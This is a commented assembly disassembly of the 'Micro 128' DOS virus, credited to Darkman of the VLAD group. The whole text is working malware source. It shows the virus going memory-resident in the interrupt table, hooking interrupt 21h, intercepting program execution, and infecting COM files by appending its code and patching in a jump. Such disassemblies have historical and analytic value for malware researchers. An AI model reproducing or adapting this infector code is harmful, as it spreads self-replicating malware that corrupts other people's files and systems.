; Darkman/VLAD ; Proudly Presents ; Disassembly of Micro 128 micro128 segment assume cs:micro128,ds:micro128,es:micro128 org 100h ; Origin of COM-file code: jumpcode db 0e9h,03h,00h ; Jump to viruscode viruscode: realcode db 0cdh,20h,90h ; Real code of infected file lea di,code ; DI = offset of code push di ; Save DI at stack mov si,di add si,[di+01h] ; SI = delta offset (viruscode) movsw ; Move the real code to beginning movsb ; " " " " " " " xor ax,ax ; Clear AX mov es,ax ; ES = interrupt table mov di,303h ; DI = offset of hole in memory mov cl,7dh ; Move 125 bytes rep movsb ; Move virus to hole in memory scasw ; Overwritten anything? jne virusexit ; Not equal? Jump to virusexit std ; Set direction flag setintvec: xchg ax,es:[di+0fd04h] ; Exchange AX with int 21h stosw ; Store address of interrupt 21h mov ax,033fh ; AX = offset of virusint21 cmc ; Complement carry flag jb setintvec ; Carry flag? Jump to setintvec cld ; Clear direction flag virusexit: push cs ; Save CS at stack pop es ; Load ES from stack (CS) ret ; Return! mvfptrbegin: mov al,00h ; Move file pointer from beginning movefileptr: mov ah,42h ; Move file pointer xor cx,cx ; Clear CX xor dx,dx ; Clear DX int 0e0h ; Do it! mov cl,03h mov dh,03h ret ; Return! micro128cod db 0e9h,?,? ; New code of infected file virusint21: cmp ah,4bh ; Load or execute? jne int21exit ; Not equal? Jump to int21exit push ax ; Save AX at stack push bx ; Save BX at stack push dx ; Save DX at stack push ds ; Save DS at stack mov ax,3d02h ; Open file (read/write) int 0e0h ; Do it! jb closefile ; Below? Jump to closefile mov bx,ax ; BX = file handle push cs ; Save CS at stack pop ds ; Load DS from stack (CS) call mvfptrbegin mov ah,3fh ; Read from file int 0e0h ; Do it! cmp byte ptr ds:[300h],'M' je closefile ; Equal? Jump to closefile dec ax ; Decrease AX call movefileptr mov ds:[33dh],ax ; Store offset of virus code mov ah,40h ; Write to file mov cl,(codeend-viruscode) int 0e0h ; Do it! call mvfptrbegin mov dl,3ch ; DX = offset of micro128cod mov ah,40h ; Write to file int 0e0h ; Do it! closefile: mov ah,3eh ; Close file int 0e0h ; Do it! pop ds ; Load DS from stack pop dx ; Load DS from stack pop bx ; Load DS from stack pop ax ; Load DS from stack int21exit: jumpfar db 0eah ; Object code of jump far codeend: micro128 ends end code